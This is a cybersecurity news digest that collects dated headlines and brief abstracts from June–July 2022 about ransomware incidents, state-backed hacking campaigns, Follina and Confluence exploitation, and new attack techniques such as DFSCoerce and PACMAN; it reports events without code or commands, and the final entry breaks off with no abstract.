Malicious actors have been observed abusing legitimate adversary simulation software in their attacks in an attempt to stay under the radar and evade detection. Palo Alto Networks Unit 42 said a malware sample uploaded to the VirusTotal database on May 19, 2022, contained a payload associated with Brute Ratel C4, a relatively new sophisticated toolkit "designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities." Authored by an Indian security researcher named Chetan Nayak , Brute Ratel (BRc4) is analogous to Cobalt Strike and is described as a "customized command-and-control center for red team and adversary simulation." The commercial software was first released in late 2020 and has since gained over 480 licenses across 350 customers. Each license is offered at $2,500 per user for a year, after which it can be renewed for the same duration at the cost of $2,250. BRc4 is equipped with a wide variety of features,The Hacker News
July 6, 2022
Less popular, but very effective, Red-Teaming Tool BRc4 used in attacks in the wild Full Text
Abstract
Threat actors are abusing legitimate adversary simulation software BRc4 in their campaigns to evade detection. Researchers from Palo Alto Networks Unit 42 discovered that a sample uploaded to the VirusTotal database on May 19, 2022 and considered...Security Affairs
July 06, 2022
US govt warns of Maui ransomware attacks against healthcare orgs Full Text
Abstract
The FBI, CISA, and the U.S. Treasury Department issued today a joint advisory warning of North-Korean-backed threat actors using Maui ransomware in attacks against Healthcare and Public Health (HPH) organizations.BleepingComputer
July 6, 2022
Solana DeFi Protocol Crema Finance Loses $8.8 Million in Flash Loan Attack Full Text
Abstract
Solana-based liquidity protocol Crema Finance had more than $8.78 million worth of cryptocurrencies stolen from its platform in an attack over the weekend, developers said in a tweet.Yahoo Finance
July 5, 2022
Iranian Fars News Agency claims cyberattack on a company involved in the construction of Tel Aviv metro Full Text
Abstract
Iran’s Fars News Agency reported that a massive cyberattack hit operating systems and servers of the Tel Aviv Metro. Iran’s Fars News Agency reported on Monday that operating systems and servers of the Tel Aviv Metro were hit by a massive cyberattack....Security Affairs
July 05, 2022
NPM supply-chain attack impacts hundreds of websites and apps Full Text
Abstract
An NPM supply-chain attack dating back to December 2021 used dozens of malicious NPM modules containing obfuscated Javascript code to compromise hundreds of downstream desktop apps and websites.BleepingComputer
July 05, 2022
Pro-China Group Uses Dragonbridge Campaign to Target Rare Earth Mining Companies Full Text
Abstract
A pro-China influence campaign singled out rare earth mining companies in Australia, Canada, and the U.S. with negative messaging in an unsuccessful attempt to manipulate public discourse to China's benefit. Targeted firms included Australia's Lynas Rare Earths Ltd, Canada's Appia Rare Earths & Uranium Corp, and the American company USA Rare Earth, threat intelligence firm Mandiant said in a report last week, calling the digital campaign Dragonbridge . "It targeted an industry of strategic significance to the PRC, including specifically three commercial entities challenging the PRC's global market dominance in that industry," Mandiant noted . The goal, the company noted, was to instigate environmental protests against the companies and propagate counter-narratives in response to potential or planned rare earths production activities involving the targets. This comprised a network of thousands of inauthentic accounts across numerous social mediThe Hacker News
July 5, 2022
8220 Gang Exploiting Vulnerabilities in WebLogic and Atlassian Servers - Warns Microsoft Full Text
Abstract
The recent campaign targets i686 and x86_64 Linux systems. It employs RCE exploits for CVE-2019-2725 (WebLogic) and CVE-2022-26134 (Atlassian Confluence Server and Data Center) for initial access.Cyware Alerts - Hacker News
July 5, 2022
Attackers Targeting Microsoft Exchange Server Via SessionManager Backdoor Full Text
Abstract
Researchers from Kaspersky have named the backdoor SessionManage, which was first spotted the threat in early 2022. It is a native-code module for Microsoft's IIS web server software.Cyware Alerts - Hacker News
July 2, 2022
Russian hackers allegedly target Ukraine’s biggest private energy firm Full Text
Abstract
Russian hackers carried out a "cyberattack" on Ukraine's biggest private energy conglomerate, the DTEK Group, in retaliation for its owner's opposition to Russia's war in Ukraine.CNN Money
June 30, 2022
Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers Full Text
Abstract
A cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign. "The updates include the deployment of new versions of a crypto miner and an IRC bot," Microsoft Security Intelligence said in a series of tweets on Thursday. "The group has actively updated its techniques and payloads over the last year." 8220, active since early 2017 , is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control (C2) servers over port 8220. It's also the developer of a tool called whatMiner, which has been co-opted by the Rocke cybercrime group in their attacks. In July 2019, the Alibaba Cloud Security Team uncovered an extra shift in the adversary's tactics, noting its use of rootkits to hide the mining program. Two years later, the gang resurfaced with Tsunami IRC botnet variants and a custom "The Hacker News
June 30, 2022
Norway Hit by Disruptive Cyberattack, Pro-Russian Hacker Group Suspected to be the Culprit Full Text
Abstract
Wednesday’s cyberattack on Norway came two days after a similar attack temporarily knocked out public and private websites in Lithuania with a pro-Moscow hacker group reportedly claiming responsibility.CNBC
June 29, 2022
Walmart denies being hit by Yanluowang ransomware attack Full Text
Abstract
American retailer Walmart has denied being hit with a ransomware attack by the Yanluowang gang after the hackers claimed to encrypt thousands of computers.BleepingComputer
June 29, 2022
Chinese Threat Actor Targets Rare Earth Mining Companies in North America, Australia Full Text
Abstract
Mandiant’s security researchers have been tracking influence campaigns that a Chinese threat actor named Dragonbridge has been conducting against rare earth mining companies in Australia, Canada, and the United States.Security Week
June 28, 2022
New Attack Method Devised to Abuse Microsoft WebView2 and Bypass MFA Full Text
Abstract
A new phishing attack could abuse Microsoft Edge WebView2 applications to steal victims’ authentication cookies, using which hackers bypass MFA for logging accounts. The attack includes a WebView2 executable, for which the researcher created a proof-of-concept that opens a genuine Microsoft login f ... Read MoreCyware Alerts - Hacker News
June 28, 2022
AMD investigates RansomHouse hack claims, theft of 450GB data Full Text
Abstract
Chip manufacturer AMD says they are investigating a cyberattack after threat actors claimed to have stolen 450 GB of data from the company last year.BleepingComputer
June 28, 2022
Tencent admits to poisoned QR code attack on QQ accounts Full Text
Abstract
The problem manifested on Sunday night and saw an unnamed number of QQ users complain their credentials no longer allowed them access to their accounts. Tencent has characterized that issue as representing "stolen" accounts.The Register
June 27, 2022
The government of Lithuania confirmed it had been hit by an intense cyberattack Full Text
Abstract
Lithuania confirmed it had been hit by an "intense" cyberattack, after Vilnius imposed restrictions on the rail transit of certain goods to Kaliningrad. The government of Lithuania announced on Monday that it had been hit by an "intense" cyberattack,...Security Affairs
June 27, 2022
New Matanbuchus Campaign drops Cobalt Strike beacons Full Text
Abstract
Matanbuchus malware-as-a-service (Maas) has been observed spreading through phishing campaigns, dropping Cobalt Strike beacons. Threat intelligence firm Cyble has observed a malware-as-a-service (Maas), named Matanbuchus, involved in malspam...Security Affairs
June 27, 2022
Vice Society claims ransomware attack on Med. University of Innsbruck Full Text
Abstract
The Vice Society ransomware gang has claimed responsibility for last week's cyberattack against the Medical University of Innsbruck, which caused severe IT service disruption and the alleged theft of data.BleepingComputer
June 26, 2022
Russia-linked actors may be behind an explosion at a liquefied natural gas plant in Texas Full Text
Abstract
Russian threat actors may be behind the explosion at a liquefied natural gas plant in Texas, the incident took place on June 8. A Russian hacking group may be responsible for a cyber attack against a liquefied natural gas plant in Texas that led to its explosion...Security Affairs
June 25, 2022
Automotive fabric supplier TB Kawashima announces cyberattack Full Text
Abstract
TB Kawashima, part of the Japanese automotive component manufacturer Toyota Boshoku of the Toyota Group of companies, announced that one of its subsidiaries has been hit by a cyberattack.BleepingComputer
June 24, 2022
Hackers Exploit Mitel VoIP Zero-Day in Likely Ransomware Attack Full Text
Abstract
A suspected ransomware intrusion against an unnamed target leveraged a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment. The findings come from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP device sitting on the network perimeter, while also identifying a previously unknown exploit as well as a couple of anti-forensic measures adopted by the actor on the device to erase traces of their actions. The exploit in question is tracked as CVE-2022-29499 and was fixed by Mitel in April 2022. It's rated 9.8 out of 10 for severity on the CVSS vulnerability scoring system, making it a critical shortcoming. "A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances – SA 100, SA 400, and Virtual SA) which could allow a malicious actor to perform remote code execution (CVE-2022-29499) within the contextThe Hacker News
June 24, 2022
Fast Shop Brazilian retailer discloses “extortion” cyberattack Full Text
Abstract
Fast Shop, one of Brazil's largest retailers, has suffered an 'extortion' cyberattack that led to network disruption and the temporary closure of its online store.BleepingComputer
June 23, 2022
Malicious Windows ‘LNK’ attacks made easy with new Quantum builder Full Text
Abstract
Malware researchers have noticed a new tool that helps cybercriminals build malicious .LNK files to deliver payloads for the initial stages of an attack.BleepingComputer
June 23, 2022
Automotive hose maker Nichirin hit by ransomware attack Full Text
Abstract
Nichirin-Flex U.S.A, a subsidiary of the Japanese car and motorcycle hose maker Nichirin, has been hit by a ransomware attack causing the company to take the network offline.BleepingComputer
June 22, 2022
Exclusive: Lithuania under cyber-attack after the ban on Russian railway goods Full Text
Abstract
Cyber Spetsnaz is targeting government resources and critical infrastructure in Lithuania after the ban of Russian railway goods Cyber Spetsnaz is targeting Lithuanian government resources and critical infrastructure – the recent ban on Russian...Security Affairs
June 22, 2022
Chinese hackers target script kiddies with info-stealer trojan Full Text
Abstract
Cybersecurity researchers have discovered a new campaign attributed to the Chinese "Tropic Trooper" hacking group, which employs a novel loader called Nimbda and a new variant of the Yahoyah trojan.BleepingComputer
June 22, 2022
Russian Hackers Exploiting Microsoft Follina Vulnerability Against Ukraine Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of a new set of spear-phishing attacks exploiting the "Follina" flaw in the Windows operating system to deploy password-stealing malware. Attributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled "Nuclear Terrorism A Very Real Threat.rtf" that, when opened, exploits the recently disclosed vulnerability to download and execute a malware called CredoMap. Follina ( CVE-2022-30190 , CVSS score: 7.8), which concerns a case of remote code execution affecting the Windows Support Diagnostic Tool (MSDT), was addressed by Microsoft on June 14, 2022, as part of its Patch Tuesday updates . According to an independent report published by Malwarebytes, CredoMap is a variant of the .NET-based credential stealer that Google Threat Analysis Group (TAG) divulged last month as having been deplThe Hacker News
June 22, 2022
Magecart attacks are still around but are more difficult to detect Full Text
Abstract
Researchers from Malwarebytes warns that the Magecart skimming campaign is active, but the attacks are more covert. Magecart threat actors have switched most of their operations server-side to avoid detection of security firms. However, Malwarebytes...Security Affairs
June 22, 2022
Microsoft: Russia stepped up cyberattacks against Ukraine’s allies Full Text
Abstract
Microsoft said today that Russian intelligence agencies have stepped up cyberattacks against governments of countries that have allied themselves with Ukraine after Russia's invasion.BleepingComputer
June 22, 2022
DFSCoerce: A New NTLM Relay Attack for Complete Account Takeover Full Text
Abstract
A new DFSCoerce Windows NTLM relay attack uses MS-DFSNM to entirely take over a Windows domain. The script used is based on the PetitPotam exploit. For this attack, researchers abused the Microsoft Active Directory Certificate Services, which is exposed to NTLM relay attacks. The best way to stop s ... Read MoreCyware Alerts - Hacker News
June 21, 2022
VIP3R Campaign Uses HTML Attachments to Bypass Email Security Full Text
Abstract
Researchers have observed new spear-phishing campaigns, dubbed VIP3R, aimed at certain organizations and individuals via infected HTML attachments. If opened, victims are directed at a phishing page impersonating a service often used by them, where they are are urged to input their username and pas ... Read MoreCyware Alerts - Hacker News
June 21, 2022
New DFSCoerce NTLM relay attack allows taking control over Windows domains Full Text
Abstract
Experts discovered a new kind of Windows NTLM relay attack dubbed DFSCoerce that allows taking control over a Windows domain. Researchers warn of a new Windows NTLM relay attack dubbed DFSCoerce that can be exploited by threat actors to take control...Security Affairs
June 21, 2022
Russian govt hackers hit Ukraine with Cobalt Strike, CredoMap malware Full Text
Abstract
The Ukrainian Computer Emergency Response Team (CERT) is warning that Russian hacking groups are exploiting the Follina code execution vulnerability in new phishing campaigns to install the CredoMap malware and Cobalt Strike beacons.BleepingComputer
June 21, 2022
New NTLM Relay Attack Lets Attackers Take Control Over Windows Domain Full Text
Abstract
A new kind of Windows NTLM relay attack dubbed DFSCoerce has been uncovered that leverages the Distributed File System (DFS): Namespace Management Protocol (MS-DFSNM) to seize control of a domain. "Spooler service disabled, RPC filters installed to prevent PetitPotam and File Server VSS Agent Service not installed but you still want to relay [Domain Controller authentication to [Active Directory Certificate Services]? Don't worry MS-DFSNM have (sic) your back," security researcher Filip Dragovic said in a tweet. MS-DFSNM provides a remote procedure call (RPC) interface for administering distributed file system configurations. The NTLM (NT Lan Manager) relay attack is a well-known method that exploits the challenge-response mechanism. It allows malicious parties to sit between clients and servers and intercept and relay validated authentication requests in order to gain unauthorized access to network resources, effectively gaining an initial foothold in Active DiThe Hacker News
June 21, 2022
Microsoft Exchange servers hacked by new ToddyCat APT gang Full Text
Abstract
An advanced persistent threat (APT) group dubbed ToddyCat has been targeting Microsoft Exchange servers throughout Asia and Europe for more than a year, since at least December 2020.BleepingComputer
June 21, 2022
Client-side Magecart attacks still around, but more covert Full Text
Abstract
For now, researchers say that Magecart client-side attacks are still around and that we could easily be missing them if we rely on automated crawlers and sandboxes, at least if we don’t make them more robust.Malwarebytes Labs
June 20, 2022
New DFSCoerce NTLM Relay attack allows Windows domain takeover Full Text
Abstract
A new Windows NTLM relay attack called DFSCoerce has been discovered that uses MS-DFSNM, Microsoft's Distributed File System, to completely take over a Windows domain.BleepingComputer
June 20, 2022
Microsoft 365 credentials targeted in new fake voicemail campaign Full Text
Abstract
A new phishing campaign has been targeting U.S. organizations in the military, security software, manufacturing supply chain, healthcare and pharmaceutical sectors to steal Microsoft Office 365 and Outlook credentials.BleepingComputer
June 19, 2022
Experts warn of a new eCh0raix ransomware campaign targeting QNAP NAS Full Text
Abstract
Experts warn of a new ech0raix ransomware campaign targeting QNAP Network Attached Storage (NAS) devices. Bleeping Computer and MalwareHunterTeam researchers, citing user reports and sample submissions on the ID Ransomware platform, warn...Security Affairs
June 19, 2022
Chinese Hackers Abuse Zero-day Bug in Sophos Firewall Full Text
Abstract
Volexity researchers laid bare a sophisticated campaign by Chinese APT abusing a critical zero-day in Sophos’ firewall product. Sophos has fixed the flaw; provided mitigations to help organizations use their firewall and protect against threat actors abusing the vulnerability.Cyware Alerts - Hacker News
June 18, 2022
QNAP NAS devices targeted by surge of eCh0raix ransomware attacks Full Text
Abstract
This week a new series of ech0raix ransomware has started targeting vulnerable QNAP Network Attached Storage (NAS) devices according to user reports and sample submissions on the ID-Ransomware platform.BleepingComputer
June 18, 2022
MaliBot Android Banking Trojan targets Spain and Italy Full Text
Abstract
Malibot is a new Android malware targeting online banking and cryptocurrency wallet customers in Spain and Italy. F5 Labs researchers spotted a new strain of Android malware, named Malibot, that is targeting online banking and cryptocurrency wallet...Security Affairs
June 17, 2022
Robert Half Discloses Hacking Attack Impacting Over 1,000 Customer Accounts Full Text
Abstract
Information provided by the company to the Maine Attorney General shows that threat actors targeted Robert Half between April 26 and May 16. The incident, discovered on May 31, impacts 1,058 individuals.Security Week
June 17, 2022
Chinese Hackers Exploited Sophos Firewall Zero-Day Flaw to Target South Asian Entity Full Text
Abstract
A sophisticated Chinese advanced persistent threat (APT) actor exploited a critical security vulnerability in Sophos' firewall product that came to light earlier this year to infiltrate an unnamed South Asian target as part of a highly-targeted attack. "The attacker implement[ed] an interesting web shell backdoor, create[d] a secondary form of persistence, and ultimately launch[ed] attacks against the customer's staff," Volexity said in a report. "These attacks aimed to further breach cloud-hosted web servers hosting the organization's public-facing websites." The zero-day flaw in question is tracked as CVE-2022-1040 (CVSS score: 9.8), and concerns an authentication bypass vulnerability that can be weaponized to execute arbitrary code remotely. It affects Sophos Firewall versions 18.5 MR3 (18.5.3) and earlier. The cybersecurity firm, which issued a patch for the flaw on March 25, 2022, noted that it was abused to "target a small set of specThe Hacker News
June 17, 2022
QNAP ‘thoroughly investigating’ new DeadBolt ransomware attacks Full Text
Abstract
Network-attached storage (NAS) vendor QNAP once again warned customers on Friday to secure their devices against a new campaign of attacks pushing DeadBolt ransomware.BleepingComputer
June 17, 2022
MaliBot Banking Trojan Targets Android Users in Italy and Spain Full Text
Abstract
F5 Labs discovered new Android-based information-stealing malware, dubbed MaliBot. It was spotted targeting online banking and cryptocurrency wallet users in Italy and Spain. Some of the banks targeted by MaliBot using this approach include UniCredit, Santander, CaixaBank, and CartaBCC. Due to the ... Read MoreCyware Alerts - Hacker News
June 16, 2022
BlackCat Ransomware affiliates target unpatched Microsoft Exchange servers Full Text
Abstract
The BlackCat ransomware gang is targeting unpatched Exchange servers to compromise target networks, Microsoft warns. Microsoft researchers have observed BlackCat ransomware gang targeting unpatched Exchange servers to compromise organizations...Security Affairs
June 15, 2022
Hackers exploit three-year-old Telerik flaws to deploy Cobalt Strike Full Text
Abstract
The threat actor known as 'Blue Mockingbird' has been observed by analysts targeting Telerik UI vulnerabilities to compromise servers, install Cobalt Strike beacons, and mine Monero by hijacking system resources.BleepingComputer
June 15, 2022
Iranian Hacking Campaign that Included Former U.S. Ambassador Full Text
Abstract
Alleged Iranian hackers were found targeting former Israeli officials, a former U.S. ambassador, the head of a security think tank, and high-ranking military personnel via spearphishing attacks. Reports in Israel also speculate that the campaign could be the work of Phosphorus, a prolific Iranian g ... Read MoreCyware Alerts - Hacker News
June 15, 2022
Extortion gang ransoms Shoprite, largest supermarket chain in Africa Full Text
Abstract
Shoprite Holdings, Africa's largest supermarket chain that operates almost three thousand stores across twelve countries in the continent, has been hit by a ransomware attack.BleepingComputer
June 14, 2022
New Hertzbleed side-channel attack affects Intel, AMD CPUs Full Text
Abstract
A new side-channel attack known as Hertzbleed allows remote attackers to steal full cryptographic keys by observing variations in CPU frequency enabled by dynamic voltage and frequency scaling (DVFS).BleepingComputer
June 14, 2022
Conti’s Attack Against Costa Rica Sparks a New Ransomware Era Full Text
Abstract
Conti claimed responsibility for the first attack against Costa Rica’s government and is believed to have some links to the ransomware-as-a-service operation HIVE, which was responsible for the second attack impacting the country's healthcare system.Wired
June 14, 2022
SeaFlower campaign distributes backdoored versions of Web3 wallets to steal seed phrases Full Text
Abstract
Chinese cybercriminals are using SeaFlower backdoored versions of iOS and Android Web3 wallets to steal users’ seed phrase. Researchers from Confiant have uncovered a sophisticated malware campaign, tracked as SeaFlower, targeting Web3 wallet users....Security Affairs
June 14, 2022
PACMAN Attack Targets Apple M1 Chip Embedded CPUs Full Text
Abstract
Researchers devised a new hardware attack aimed at Pointer Authentication in Apple M1 chip-based CPUs, that may allow an attacker to run arbitrary code on Mac systems. The attack is an exploitation technique but it cannot affect the system on its own. Apple has claimed that the issue does not ... Read MoreCyware Alerts - Hacker News
June 13, 2022
Gallium hackers backdoor finance, govt orgs using new PingPull malware Full Text
Abstract
The Gallium state-sponsored hacking group has been spotted using a new 'PingPull' remote access trojan against financial institutions and government entities in Europe, Southeast Asia, and Africa.BleepingComputer
June 13, 2022
Chinese ‘Gallium’ Hackers Using New PingPull Malware in Cyberespionage Attacks Full Text
Abstract
A Chinese advanced persistent threat (APT) known as Gallium has been observed using a previously undocumented remote access trojan in its espionage attacks targeting companies operating in Southeast Asia, Europe, and Africa. Called PingPull , the "difficult-to-detect" backdoor is notable for its use of the Internet Control Message Protocol ( ICMP ) for command-and-control (C2) communications, according to new research published by Palo Alto Networks Unit 42 today. Gallium is known for its attacks primarily aimed at telecom companies dating as far back as 2012. Also tracked under the name Soft Cell by Cybereason, the state-sponsored actor has been connected to a broader set of attacks targeting five major telecom companies located in Southeast Asian countries since 2017. Over the past year, however, the group is said to have expanded its victimology footprint to include financial institutions and government entities located in Afghanistan, Australia, Belgium, CambodiThe Hacker News
June 13, 2022
HelloXD Ransomware operators install MicroBackdoor on target systems Full Text
Abstract
Experts observed the HelloXD ransomware deploying a backdoor to facilitate persistent remote access to infected hosts. The HelloXD ransomware first appeared in the threat landscape on November 30, 2021, it borrows the code from Babuk ransomware,...Security Affairs
June 13, 2022
Microsoft: Exchange servers hacked to deploy BlackCat ransomware Full Text
Abstract
Microsoft says BlackCat ransomware affiliates are now attacking Microsoft Exchange servers using exploits targeting unpatched vulnerabilities.BleepingComputer
June 13, 2022
Russian hackers start targeting Ukraine with Follina exploits Full Text
Abstract
Ukraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190.BleepingComputer
June 12, 2022
Iranian Hackers Spotted Using a new DNS Hijacking Malware in Recent Attacks Full Text
Abstract
The Iranian state-sponsored threat actor tracked under the moniker Lyceum has turned to using a new custom .NET-based backdoor in recent campaigns directed against the Middle East. "The new malware is a .NET based DNS Backdoor which is a customized version of the open source tool 'DIG.net,'" Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a report published last week. "The malware leverages a DNS attack technique called 'DNS Hijacking' in which an attacker-controlled DNS server manipulates the response of DNS queries and resolves them as per their malicious requirements." DNS hijacking is a redirection attack in which DNS queries to genuine websites are intercepted to take an unsuspecting user to fraudulent pages under an adversary's control. Unlike cache poisoning , DNS hijacking targets the DNS record of the website on the nameserver, rather than a resolver's cache. Lyceum , also known as Hexane, SpirliThe Hacker News
June 11, 2022
Confluence servers hacked to deploy AvosLocker, Cerber2021 ransomware Full Text
Abstract
Ransomware gangs are now targeting a recently patched and actively exploited remote code execution (RCE) vulnerability affecting Atlassian Confluence Server and Data Center instances for initial access to corporate networks.BleepingComputer
June 11, 2022
PACMAN, a new attack technique against Apple M1 CPUs Full Text
Abstract
PACMAN is a new attack technique demonstrated against Apple M1 processor chipsets that could be used to hack macOS systems. PACMAN is a novel hardware attack technique that can allow attackers to bypass Pointer Authentication (PAC) on the Apple...Security Affairs
June 10, 2022
Threat actors exploit recently disclosed Atlassian Confluence flaw in cryptomining campaign Full Text
Abstract
Threat actors are exploiting the recently disclosed CVE-2022-26134 RCE in Atlassian Confluence servers to deploy cryptocurrency miners. CheckPoint researchers have observed threat actors exploiting the recently disclosed CVE-2022-26134 remote code...Security Affairs
June 10, 2022
New PACMAN hardware attack targets Macs with Apple M1 CPUs Full Text
Abstract
A new hardware attack targeting Pointer Authentication in Apple M1 CPUs with speculative execution enables attackers to gain arbitrary code execution on Mac systems.BleepingComputer
June 10, 2022
Iranian hackers target energy sector with new DNS backdoor Full Text
Abstract
The Iranian Lycaeum APT hacking group uses a new .NET-based DNS backdoor to conduct attacks on companies in the energy and telecommunication sectors.BleepingComputer
June 9, 2022
Cyber Spetsnaz’s Operation Panopticon Launches Espionage Attacks Full Text
Abstract
Researchers have identified an increase in activity by a new hacktivist group called Cyber Spetsnaz that has been targeting NATO infrastructure. In April, Cyber Spetsnaz created its first division called Zarya, with a bunch of experienced penetration testers, OSINT specialists, and hackers. The gro ... Read MoreCyware Alerts - Hacker News
June 09, 2022
Vice Society ransomware claims attack on Italian city of Palermo Full Text
Abstract
The Vice Society ransomware group has claimed responsibility for the recent cyber attack on the city of Palermo in Italy, which has caused a large-scale service outage.BleepingComputer
June 09, 2022
A Decade-Long Chinese Espionage Campaign Targets Southeast Asia and Australia Full Text
Abstract
A previously undocumented Chinese-speaking advanced persistent threat (APT) actor dubbed Aoqin Dragon has been linked to a string of espionage-oriented attacks aimed at government, education, and telecom entities chiefly in Southeast Asia and Australia dating as far back as 2013. "Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices," SentinelOne researcher Joey Chen said in a report shared with The Hacker News. "Other techniques the attacker has been observed using include DLL hijacking, Themida-packed files , and DNS tunneling to evade post-compromise detection." The group is said to have some level of association with another threat actor known as Naikon (aka Override Panda), with campaigns primarily directed against targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Infections chains mounted by Aoqin Dragon have banked on Asia-Pacific political affairs and pornographic-themed docuThe Hacker News
June 9, 2022
Tainted CCleaner Pro Cracker spreads via Black Seo campaign Full Text
Abstract
Threat actors spread info-stealing malware through the search results for a pirated copy of the CCleaner Pro Windows optimization program. Researchers from Avast have uncovered a malware campaign, tracked as FakeCrack, spreading through the search...Security Affairs
June 9, 2022
MakeMoney malvertising campaign adds fake update template Full Text
Abstract
Malwarebytes researchers identified a malvertising campaign leading to a fake Firefox update. The template is strongly inspired from similar schemes and in particular the one distributed by the FakeUpdates (SocGholish) threat actors.Malwarebytes Labs
June 7, 2022
Follina Exploited by State-Sponsored Hackers Full Text
Abstract
A government-aligned attacker tried using a Microsoft vulnerability to attack U.S. and E.U. government targets.Threatpost
June 07, 2022
Researchers Warn of Spam Campaign Targeting Victims with SVCReady Malware Full Text
Abstract
A new wave of phishing campaigns has been observed spreading a previously documented malware called SVCReady . "The malware is notable for the unusual way it is delivered to target PCs — using shellcode hidden in the properties of Microsoft Office documents," Patrick Schläpfer, a threat analyst at HP, said in a technical write-up. SVCReady is said to be in its early stage of development, with the authors iteratively updating the malware several times last month. First signs of activity date back to April 22, 2022. Infection chains involve sending Microsoft Word document attachments to targets via email that contain VBA macros to activate the deployment of malicious payloads. But where this campaign stands apart is that instead of employing PowerShell or MSHTA to retrieve next-stage executables from a remote server, the macro runs shellcode stored in the document properties , which subsequently drops the SVCReady malware. In addition to achieving persistence on the iThe Hacker News
June 07, 2022
Online gun shops in the US hacked to steal credit cards Full Text
Abstract
Rainier Arms and Numrich Gun Parts, two American gun shops that operate e-commerce sites on rainierarms.com and gunpartscorp.com, have disclosed data breach incidents resulting from card skimmer infections on their sites.BleepingComputer
June 6, 2022
Lockbit ransomware gang claims to have hacked cybersecurity giant Mandiant Full Text
Abstract
LockBit ransomware gang claims to have hacked the cybersecurity firm Mandiant, which is investigating the alleged security breach. Today the LockBit ransomware gang has added the cybersecurity firm Mandiant to the list of victims published on its darkweb...Security Affairs
June 06, 2022
Mandiant: “No evidence” we were hacked by LockBit ransomware Full Text
Abstract
American cybersecurity firm Mandiant is investigating LockBit ransomware gang's claims that they hacked the company's network and stole data.BleepingComputer
June 6, 2022
SMSFactory Targets Android Users Across Eight Countries Full Text
Abstract
SMSFactory has already targeted more than 165,000 Avast customers from May 2021 to May 2022. Most of the victims were located in Brazil, Ukraine, Argentina, Russia, and Turkey. The main goal is to send premium texts and make calls to premium phone numbers. However, the malware can steal the contact ... Read MoreCyware Alerts - Hacker News
June 06, 2022
Microsoft Seizes 41 Domains Used in Spear-Phishing Attacks by Bohrium Hackers Full Text
Abstract
Microsoft's Digital Crimes Unit (DCU) last week disclosed that it had taken legal proceedings against an Iranian threat actor dubbed Bohrium in connection with a spear-phishing operation. The adversarial collective is said to have targeted entities in tech, transportation, government, and education sectors located in the U.S., Middle East, and India. "Bohrium actors create fake social media profiles, often posing as recruiters," Amy Hogan-Burney of the DCU said in a tweet. "Once personal information was obtained from the victims, Bohrium sent malicious emails with links that ultimately infected their target's computers with malware." According to an ex parte order shared by the tech giant, the goal of the intrusions was to steal and exfiltrate sensitive information, take control over the infected machines, and carry out remote reconnaissance. To halt the malicious activities of Bohrium, Microsoft said it took down 41 ".com," ".infoThe Hacker News
June 6, 2022
Another nation-state actor exploits Microsoft Follina to attack European and US entities Full Text
Abstract
A nation-state actor is attempting to exploit the Follina flaw in a recent wave of attacks against government entities in Europe and the U.S. An alleged nation-state actor is attempting to exploit the recently disclosed Microsoft Office Follina vulnerability...Security Affairs
June 6, 2022
WatchDog Targets Docker And Redis Servers In New Cryptojacking Campaign Full Text
Abstract
The group targets misconfigured Docker Engine API endpoints with an open port 2375 for accessing daemon in default settings. Subsequently, it lists or modifies containers and runs arbitrary shell commands.Cyware Alerts - Hacker News
June 6, 2022
Exclusive: Pro-Russia group ‘Cyber Spetsnaz’ is attacking government agencies Full Text
Abstract
Resecurity, Inc. (USA) has identified an increase in activity within hacktivist groups conducted by a new group called “Cyber Spetsnaz”. Resecurity, Inc. (USA) has identified an increase in activity within hacktivist groups, they’re leveraging...Security Affairs
June 05, 2022
State-Backed Hackers Exploit Microsoft ‘Follina’ Bug to Target Entities in Europe and U.S Full Text
Abstract
A suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office "Follina" vulnerability to target government entities in Europe and the U.S. Enterprise security firm Proofpoint said it blocked attempts at exploiting the remote code execution flaw, which is being tracked CVE-2022-30190 (CVSS score: 7.8). No less than 1,000 phishing messages containing a lure document were sent to the targets. "This campaign masqueraded as a salary increase and utilized an RTF with the exploit payload downloaded from 45.76.53[.]253," the company said in a series of tweets. The payload, which manifests in the form of a PowerShell script, is Base64-encoded and functions as a downloader to retrieve a second PowerShell script from a remote server named "seller-notification[.]live." "This script checks for virtualization, steals information from local browsers, mail clients and file services, conducts machine reconThe Hacker News
June 04, 2022
Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild Full Text
Abstract
Atlassian on Friday rolled out fixes to address a critical security flaw affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve remote code execution. Tracked as CVE-2022-26134 , the issue is similar to CVE-2021-26084 — another security flaw the Australian software company patched in August 2021. Both relate to a case of Object-Graph Navigation Language ( OGNL ) injection that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance. The newly discovered shortcoming impacts all supported versions of Confluence Server and Data Center, with every version after 1.3.0 also affected. It's been resolved in the following versions - 7.4.17 7.13.7 7.14.3 7.15.2 7.16.4 7.17.4 7.18.1 According to stats from internet asset discovery platform Censys , there are about 9,325 services across 8,347 distinct hosts running a vulnerable version of Atlassian ConfluencThe Hacker News
June 3, 2022
Several Elasticsearch Databases Attacked for Ransom Full Text
Abstract
Secureworks spotted a new campaign targeting vulnerable Elasticsearch databases to replace their indexes with a ransom note; a total ransom of $280,000 has been demanded. The attackers have used an automated script to parse unprotected databases, wipe out their data, and add the ransom note. Admins ... Read MoreCyware Alerts - Hacker News
June 03, 2022
Novartis says no sensitive data was compromised in cyberattack Full Text
Abstract
Pharmaceutical giant Novartis says no sensitive data was compromised in a recent cyberattack by the Industrial Spy data-extortion gang.BleepingComputer
June 03, 2022
Chinese LuoYu Hackers Using Man-on-the-Side Attacks to Deploy WinDealer Backdoor Full Text
Abstract
